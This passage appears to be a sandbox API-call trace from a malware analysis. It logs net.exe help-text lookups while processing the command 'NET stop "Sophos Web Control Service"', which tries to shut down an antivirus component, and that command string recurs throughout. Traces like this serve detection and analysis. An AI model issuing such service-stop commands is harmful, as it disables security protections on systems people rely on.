(hMem=0x573f78) returned 0x0 [0199.532] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x19 [0199.532] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x29) returned 11 [0199.532] LocalFree (hMem=0x573f78) returned 0x0 [0199.532] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14㽸W寮\x14") returned 0xc1 [0199.532] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT:\"tex", _MaxCount=0x29) returned 7 [0199.532] LocalFree (hMem=0x575868) returned 0x0 [0199.532] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14塨W寮\x14") returned 0x16 [0199.532] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x29) returned 3 [0199.532] LocalFree (hMem=0x573f78) returned 0x0 [0199.532] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x33 [0199.532] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [/DELETE] [", _MaxCount=0x29) returned 15 [0199.532] LocalFree (hMem=0x573f78) returned 0x0 [0199.532] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14㽸W寮\x14") returned 0x234 [0199.532] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET SHARE\r\nsharename\r\n sharename", _MaxCount=0x29) returned 12 [0199.532] LocalFree (hMem=0x575868) returned 0x0 [0199.532] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14塨W寮\x14") returned 0x13 [0199.532] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x29) returned 14 [0199.532] LocalFree (hMem=0x573f78) returned 0x0 [0199.532] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x14 [0199.532] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x29) returned 14 [0199.532] LocalFree (hMem=0x573f78) returned 0x0 [0199.532] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x14 [0199.532] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x29) returned 14 [0199.532] LocalFree (hMem=0x573f78) returned 0x0 [0199.533] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x15 [0199.533] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x29) returned 14 [0199.533] LocalFree (hMem=0x573f78) returned 0x0 [0199.533] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x15 [0199.533] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x29) returned 14 [0199.533] LocalFree (hMem=0x573f78) returned 0x0 [0199.533] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x16 [0199.533] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x29) returned 14 [0199.533] LocalFree (hMem=0x573f78) returned 0x0 [0199.533] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x11 [0199.533] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x29) returned 14 [0199.533] LocalFree (hMem=0x573f78) returned 0x0 [0199.533] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x14 [0199.533] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x29) returned 14 [0199.533] LocalFree (hMem=0x573f78) returned 0x0 [0199.533] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x12 [0199.533] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x29) returned 14 [0199.533] LocalFree (hMem=0x573f78) returned 0x0 [0199.533] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0xf [0199.533] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x29) returned 14 [0199.533] LocalFree (hMem=0x573f78) returned 0x0 [0199.533] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x17 [0199.533] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x29) returned 14 [0199.533] LocalFree (hMem=0x573f78) returned 0x0 [0199.533] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x18 [0199.533] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x29) returned 14 [0199.533] LocalFree (hMem=0x573f78) returned 0x0 [0199.533] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x2a [0199.533] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | SERVER]\r\n\r", _MaxCount=0x29) returned 14 [0199.533] LocalFree (hMem=0x573f78) returned 0x0 [0199.533] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x15 [0199.533] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x29) returned 19 [0199.533] LocalFree (hMem=0x573f78) returned 0x0 [0199.533] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14㽸W寮\x14") returned 0x58 [0199.533] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAIN[:do", _MaxCount=0x29) returned -1 [0199.533] LocalFree (hMem=0x575868) returned 0x0 [0199.533] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0x184 [0199.534] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\computername", _MaxCount=0x29) returned -2 [0199.534] LocalFree (hMem=0x575868) returned 0x0 [0199.534] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0xc7 [0199.534] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET USER\r\n[username [password | *] [optio", _MaxCount=0x29) returned -2 [0199.534] LocalFree (hMem=0x575868) returned 0x0 [0199.534] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0x47 [0199.534] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CACHE] | [/AL", _MaxCount=0x29) returned -3 [0199.534] LocalFree (hMem=0x575868) returned 0x0 [0199.534] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0xc2 [0199.534] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CONFIG |", _MaxCount=0x29) returned 19 [0199.534] LocalFree (hMem=0x575868) returned 0x0 [0199.534] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0x319 [0199.534] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="SERVICES\r\nNET START can be used to start ", _MaxCount=0x29) returned -5 [0199.534] LocalFree (hMem=0x575868) returned 0x0 [0199.534] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0x483 [0199.534] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="SYNTAX\r\nThe following conventions are use", _MaxCount=0x29) returned -5 [0199.534] LocalFree (hMem=0x575868) returned 0x0 [0199.534] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0xa86 [0199.534] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NAMES\r\nThe following types of names are u", _MaxCount=0x29) returned 4 [0199.534] LocalFree (hMem=0x575868) returned 0x0 [0199.534] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0x54 [0199.534] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="\r\nFor more information on tools see the c", _MaxCount=0x29) returned 97 [0199.534] LocalFree (hMem=0x575868) returned 0x0 [0199.534] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0xad [0199.534] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{m", _MaxCount=0x1e) returned 18 [0199.534] LocalFree (hMem=0x575868) returned 0x0 [0199.534] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14塨W寮\x14") returned 0x2e [0199.534] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET COMPUTER\r\n\\\\computername {", _MaxCount=0x1e) returned 16 [0199.534] LocalFree (hMem=0x573f78) returned 0x0 [0199.535] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14㽸W寮\x14") returned 0x7d [0199.535] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET CONFIG SERVER\r\n[/AUTODISCO", _MaxCount=0x1e) returned 16 [0199.535] LocalFree (hMem=0x575868) returned 0x0 [0199.535] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14塨W寮\x14") returned 0x26 [0199.535] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET CONFIG\r\n[SERVER | WORKSTAT", _MaxCount=0x1e) returned 16 [0199.535] LocalFree (hMem=0x573f78) returned 0x0 [0199.535] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x19 [0199.535] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1e) returned 16 [0199.535] LocalFree (hMem=0x573f78) returned 0x0 [0199.535] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x1b [0199.535] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x1e) returned 13 [0199.535] LocalFree (hMem=0x573f78) returned 0x0 [0199.535] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14㽸W寮\x14") returned 0xbe [0199.535] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET GROUP\r\n[groupname [/COMMEN", _MaxCount=0x1e) returned 12 [0199.535] LocalFree (hMem=0x575868) returned 0x0 [0199.535] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14塨W寮\x14") returned 0x33 [0199.535] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET HELP\r\ncommand\r\n -or-\r\n", _MaxCount=0x1e) returned 11 [0199.535] LocalFree (hMem=0x573f78) returned 0x0 [0199.535] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x19 [0199.535] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1e) returned 11 [0199.535] LocalFree (hMem=0x573f78) returned 0x0 [0199.535] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14㽸W寮\x14") returned 0xc1 [0199.535] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET LOCALGROUP\r\n[groupname [/C", _MaxCount=0x1e) returned 7 [0199.535] LocalFree (hMem=0x575868) returned 0x0 [0199.535] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14塨W寮\x14") returned 0x16 [0199.535] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1e) returned 3 [0199.535] LocalFree (hMem=0x573f78) returned 0x0 [0199.535] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x33 [0199.535] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET SESSION\r\n[\\\\computername] ", _MaxCount=0x1e) returned 15 [0199.535] LocalFree (hMem=0x573f78) returned 0x0 [0199.535] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14㽸W寮\x14") returned 0x234 [0199.535] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1e) returned 12 [0199.535] LocalFree (hMem=0x575868) returned 0x0 [0199.535] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14塨W寮\x14") returned 0x13 [0199.535] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET START BROWSER\r\n", _MaxCount=0x1e) returned 14 [0199.535] LocalFree (hMem=0x573f78) returned 0x0 [0199.535] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x14 [0199.536] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1e) returned 14 [0199.536] LocalFree (hMem=0x573f78) returned 0x0 [0199.536] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x14 [0199.536] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1e) returned 14 [0199.536] LocalFree (hMem=0x573f78) returned 0x0 [0199.536] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x15 [0199.536] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET START MESSENGER\r\n", _MaxCount=0x1e) returned 14 [0199.536] LocalFree (hMem=0x573f78) returned 0x0 [0199.536] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x15 [0199.536] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET START NET LOGON\r\n", _MaxCount=0x1e) returned 14 [0199.536] LocalFree (hMem=0x573f78) returned 0x0 [0199.536] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x16 [0199.536] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1e) returned 14 [0199.536] LocalFree (hMem=0x573f78) returned 0x0 [0199.536] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x11 [0199.536] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET START RPCSS\r\n", _MaxCount=0x1e) returned 14 [0199.536] LocalFree (hMem=0x573f78) returned 0x0 [0199.536] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x14 [0199.536] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1e) returned 14 [0199.536] LocalFree (hMem=0x573f78) returned 0x0 [0199.536] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x12 [0199.536] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET START SERVER\r\n", _MaxCount=0x1e) returned 14 [0199.536] LocalFree (hMem=0x573f78) returned 0x0 [0199.536] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0xf [0199.536] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET START UPS\r\n", _MaxCount=0x1e) returned 14 [0199.536] LocalFree (hMem=0x573f78) returned 0x0 [0199.536] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x17 [0199.536] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1e) returned 14 [0199.536] LocalFree (hMem=0x573f78) returned 0x0 [0199.536] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x18 [0199.536] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1e) returned 14 [0199.536] LocalFree (hMem=0x573f78) returned 0x0 [0199.536] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x2a [0199.536] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET STATISTICS\r\n[WORKSTATION |", _MaxCount=0x1e) returned 14 [0199.536] LocalFree (hMem=0x573f78) returned 0x0 [0199.536] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x15 [0199.536] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1e) returned 19 [0199.536] LocalFree (hMem=0x573f78) returned 0x0 [0199.537] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14㽸W寮\x14") returned 0x58 [0199.537] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET TIME\r\n\r\n[\\\\computername | ", _MaxCount=0x1e) returned -1 [0199.537] LocalFree (hMem=0x575868) returned 0x0 [0199.537] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0x184 [0199.537] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET USE\r\n[devicename | *] [\\\\c", _MaxCount=0x1e) returned -2 [0199.537] LocalFree (hMem=0x575868) returned 0x0 [0199.537] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0xc7 [0199.537] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET USER\r\n[username [password ", _MaxCount=0x1e) returned -2 [0199.537] LocalFree (hMem=0x575868) returned 0x0 [0199.537] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0x47 [0199.537] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET VIEW\r\n[\\\\computername [/CA", _MaxCount=0x1e) returned -3 [0199.537] LocalFree (hMem=0x575868) returned 0x0 [0199.537] 